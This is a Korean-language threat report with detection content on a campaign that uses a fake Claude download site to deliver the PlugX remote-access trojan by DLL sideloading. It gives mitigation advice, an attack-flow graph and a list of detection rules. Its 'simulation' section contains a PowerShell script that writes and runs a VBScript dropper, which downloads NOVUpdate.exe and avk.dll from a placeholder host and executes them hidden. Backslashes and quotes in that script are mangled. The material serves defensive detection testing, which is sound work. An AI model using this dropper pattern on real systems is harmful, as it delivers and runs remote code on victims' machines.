팔로우 
Detection stack
- AIDR
- Alert
- ETL
- Query
요약
공격자들은 의심하지 않는 사용자들에게 트로이 목마가 포함된 ZIP 아카이브를 전달하는 가짜 Claude 다운로드 페이지를 설정했습니다. 아카이브를 열면 겉보기에 합법적인 Claude 데스크톱 클라이언트를 설치하며, 동시에 서명된 G DATA 업데이터와 함께 DLL 사이드로딩을 통해 PlugX 원격 액세스 트로이 목마를 은밀하게 배포합니다. 악성 페이로드는 사용자 시작 폴더에 위치하여 지속성을 유지하며, 이후 명령 및 제어 서버와의 아웃바운드 HTTPS 통신을 시작합니다. 이 캠페인은 위협 행위자들이 점점 더 소셜 엔지니어링 속임수로 대중적인 AI 도구들에 대한 관심을 초기 침투를 위한 미끼로 활용하고 있음을 보여줍니다.
조사
분석 중에 연구자들은 ZIP 아카이브를 풀고 MSI 설치 경로를 식별한 후 VBScript 드로퍼 실행을 따라갔습니다. 이 스크립트는 NOVUpdate.exe, 악성 avk.dll, 그리고 암호화된 데이터 파일을 시작 폴더에 기록했습니다. 샌드박스 실행은 사이드로딩된 바이너리가 성공적으로 실행되었음을 확인하고, TCP/IP 관련 레지스트리 키를 변경하며 포트 443을 통해 아웃바운드 연결이 알리바바 클라우드가 호스팅한 IP 주소로 시작되었음을 확인했습니다. 이러한 발견은 합법적인 AI 소프트웨어로 위장된 단계적 감염 체인을 통한 PlugX의 전달을 확인했습니다.
완화
사용자는 Claude 소프트웨어를 검증된 공식 소스에서만 다운로드하고, 실행 전 설치 패키지의 정품 여부를 확인해야 합니다. 수비자는 시작 폴더에서 합법 업데이트 구성 요소를 모방하는 예기치 않은 바이너리나 DLL을 검사해야 합니다. 방화벽 및 엔드포인트 원격 측정 데이터도 새로 설치된 애플리케이션과 연결된 의심스러운 HTTPS 트래픽을 검토해야 합니다. 위협을 방지하기 위한 주요 단계는 악성 파일 제거, 무단 레지스트리 변경사항 되돌리기, 신뢰할 수 있는 안티 멀웨어 스캔 실행입니다.
응답
보안 팀은 NOVUpdate.exe, avk.dll(으)로 NOVUpdate.exe.dat 의 존재를 탐지하고 경고해야 합니다. 추가 탐지는 서명된 G DATA 업데이트 바이너리가 신뢰할 수 없는 DLL을 로드하고 식별된 인프라로 예기치 않은 아웃바운드 TLS 세션을 설정하는 것에 집중해야 합니다. 영향을 받은 호스트는 전체 완화 및 포렌식 검토를 통해 다른 PlugX 구성 요소나 지속성 메커니즘, 후속 페이로드가 활성 상태로 남아 있지 않은지 확인해야 합니다.
graph TB %% Class definitions classDef technique fill:#ffdd99 classDef file fill:#c2f0c2 classDef script fill:#d9d9ff classDef process fill:#f0c2c2 classDef persistence fill:#ffd9b3 classDef c2 fill:#b3e5fc classDef evasion fill:#e6b3ff classDef registry fill:#ffe699 %% Nodes u2013 Files and Artifacts node_spoofed_website[“<b>파일</b> – 위장된 Claude 웹사이트<br/>악성 ZIP 호스팅”]:::file node_malicious_zip[“<b>파일</b> – 악성 ZIP<br/>트로이화된 MSI 설치 파일 포함”]:::file node_msi_installer[“<b>파일</b> – 트로이화된 MSI 설치 파일”]:::file node_vbscript[“<b>스크립트</b> – Claude AI.vbs<br/>파일 복사, Claude 실행, 지속성 설정”]:::script node_novupdate_exe[“<b>파일</b> – NOVUpdate.exe<br/>G DATA 정식 업데이트 프로그램 (DLL sideloading)”]:::file node_avk_dll[“<b>파일</b> – avk.dll<br/>악성 DLL”]:::file node_dat_file[“<b>파일</b> – NOVUpdate.exe.dat<br/>암호화된 페이로드”]:::file node_startup_folder[“<b>파일</b> – 시작 프로그램 폴더<br/>복사 대상 위치”]:::file node_shortcut[“<b>파일</b> – Claude AI.lnk<br/>VBScript 실행 바로가기”]:::file node_cleanup_batch[“<b>파일</b> – cleanup.bat<br/>악성 아티팩트 삭제”]:::file node_registry_key[“<b>레지스트리</b> – HKLM\System\CurrentControlSet\Services\Tcpip\Parameters”]:::registry %% Nodes u2013 Techniques node_initial_access[“<b>기법</b> – T1204.002 사용자 실행<br/>사용자가 ZIP 다운로드 후 MSI 실행”]:::technique node_execution[“<b>기법</b> – T1059.005 Visual Basic<br/>악성 VBScript 실행”]:::technique node_persistence_startup[“<b>기법</b> – T1037.005 시작 항목<br/>Startup 폴더에 파일 복사”]:::persistence node_persistence_shortcut[“<b>기법</b> – T1547.009 바로가기 변경”]:::persistence node_appcert_dll[“<b>기법</b> – T1546.009 AppCert DLL<br/>DLL sideloading”]:::evasion node_obfuscation[“<b>기법</b> – T1027.009 난독화 파일<br/>실행 시 복호화”]:::evasion node_registry_mod[“<b>기법</b> – T1012 레지스트리 조회”]:::registry node_c2_proxy[“<b>기법</b> – T1090.002 프록시”]:::c2 node_c2_web[“<b>기법</b> – T1102 웹 서비스”]:::c2 node_indicator_removal[“<b>기법</b> – T1070.010 흔적 제거”]:::evasion %% Flow Connections node_spoofed_website –>|hosts| node_malicious_zip node_malicious_zip –>|delivered via| node_msi_installer node_msi_installer –>|drops| node_vbscript node_msi_installer –>|drops| node_novupdate_exe node_msi_installer –>|drops| node_avk_dll node_msi_installer –>|drops| node_dat_file node_initial_access –>|leads to| node_msi_installer node_vbscript –>|executes| node_execution node_execution –>|enables| node_persistence_startup node_execution –>|creates| node_shortcut node_persistence_startup –>|copies to| node_startup_folder node_startup_folder –>|contains| node_novupdate_exe node_startup_folder –>|contains| node_avk_dll node_startup_folder –>|contains| node_dat_file node_persistence_shortcut –>|creates| node_shortcut node_persistence_shortcut –>|replaces with clean| node_shortcut node_appcert_dll –>|loads| node_avk_dll node_obfuscation –>|decrypts| node_dat_file node_registry_mod –>|modifies| node_registry_key node_c2_proxy –>|uses| node_c2_web node_indicator_removal –>|creates| node_cleanup_batch node_cleanup_batch –>|deletes| node_vbscript node_cleanup_batch –>|deletes| node_msi_installer %% Class Assignments class node_initial_access technique class node_execution technique class node_persistence_startup persistence class node_persistence_shortcut persistence class node_appcert_dll evasion class node_obfuscation evasion class node_registry_mod registry class node_c2_proxy c2 class node_c2_web c2 class node_indicator_removal evasion
공격 흐름
탐지
LOLBAS WScript / CScript (via process_creation)
보기
지연 실행을 위한 가능한 타임아웃 사용 (via cmdline)
보기
자동 시작 위치의 의심스러운 바이너리 / 스크립트 (via file_event)
보기
탐지할 IOCs (HashSha256): 가짜 Claude 사이트가 공격자가 컴퓨터에 액세스할 수 있도록 하는 악성 소프트웨어를 설치합니다
보기
탐지할 IOCs (SourceIP): 가짜 Claude 사이트가 공격자가 컴퓨터에 액세스할 수 있도록 하는 악성 소프트웨어를 설치합니다
보기
탐지할 IOCs (DestinationIP): 가짜 Claude 사이트가 공격자가 컴퓨터에 액세스할 수 있도록 하는 악성 소프트웨어를 설치합니다
보기
WScript 드롭 및 NOVUpdate.exe 실행 탐지 [Windows Process Creation]
보기
가짜 Claude 사이트 트로이 목마 설치 프로그램 탐지 [Windows File Event]
보기
시뮬레이션 실행
전제 조건: 원격 측정 및 기본 플라이트 전 검사가 통과해야 합니다.
이유: 이 섹션에서는 탐지 규칙을 트리거하기 위해 고안된 적의 기술(기술 전술 절차, TTP)의 정확한 실행을 설명합니다. 명령 및 설명은 발견된 TTP를 직접 반영하고 탐지 논리에서 기대하는 정확한 원격 측정을 생성해야 합니다. 추상적이거나 관련이 없는 예시는 잘못된 진단을 초래할 것입니다.
-
공격 내러티브 및 명령:
공격자는 페이로드를 다운로드하는 악성 VBS 스크립트를 조작합니다NOVUpdate.exe명령 및 제어(C2) 서버에서%TEMP%에 기록한 후 실행합니다wscript.exe. 동일한 스크립트는 또한 DLL 사이드로딩을 달성하기 위해 동일한 위치에서avk.dll을 로드합니다. 공격자는 전통적인 AV 휴리스틱에서 의심을 피하기 위해 내장된 Windows Script Host (WSH)를 사용합니다.- 악성 VBS 파일 기록 (
malicious.vbs) 에%TEMP%. - 호출
wscript.exeVBS 파일 경로와 함께 - .
NOVUpdate.exeandavk.dll, 디스크에 기록하고 실행합니다NOVUpdate.exe.
- 악성 VBS 파일 기록 (
-
회귀 테스트 스크립트:
# -------------------------------------------------------------------- # 악성 드로퍼 시뮬레이션 – Sigma 규칙을 트리거 # -------------------------------------------------------------------- $tempDir = "$env:TEMPDropperDemo" New-Item -ItemType Directory -Path $tempDir -Force | Out-Null # 1. 악성 VBS 생성하여 두 파일을 다운로드하고 NOVUpdate.exe 실행 $vbsPath = "$tempDirmalicious.vbs" $vbsContent = @" Set objXML = CreateObject("Microsoft.XMLHTTP") objXML.open "GET", "http://example.com/NOVUpdate.exe", False objXML.send If objXML.Status = 200 Then Set objStream = CreateObject("ADODB.Stream") objStream.Type = 1 objStream.Open objStream.Write objXML.ResponseBody objStream.SaveToFile "$tempDirNOVUpdate.exe", 2 objStream.Close End If
‘ 다운로드 avk.dll (DLL 사이드로딩에 사용됨) objXML.open “GET”, “http://example.com/avk.dll“, False objXML.send If objXML.Status = 200 Then Set objStream = CreateObject(“ADODB.Stream”) objStream.Type = 1 objStream.Open objStream.Write objXML.ResponseBody objStream.SaveToFile “$tempDiravk.dll”, 2 objStream.Close End If
‘ 드롭된 EXE 실행 CreateObject(“WScript.Shell”).Run “””$tempDirNOVUpdate.exe”””, 0, False “@ Set-Content -Path $vbsPath -Value $vbsContent -Encoding ASCII
# 2. wscript.exe를 통해 스크립트 실행 (이것이 우리가 테스트하는 원격 측정입니다)
$wscript = "$env:SystemRootSystem32wscript.exe"
Start-Process -FilePath $wscript -ArgumentList "`"$vbsPath`"" -WindowStyle Hidden
# OPTIONAL: 탐지가 발동하도록 일시 중지
Start-Sleep -Seconds 10
# --------------------------------------------------------------------
-
정리 명령:
# 시뮬레이션에서 생성된 모든 아티팩트 제거 $tempDir = "$env:TEMPDropperDemo" if (Test-Path $tempDir) { Remove-Item -Path $tempDir -Recurse -Force } # 남아있는 모든 NOVUpdate.exe 프로세스를 종료 Get-Process -Name "NOVUpdate" -ErrorAction SilentlyContinue | Stop-Process -Force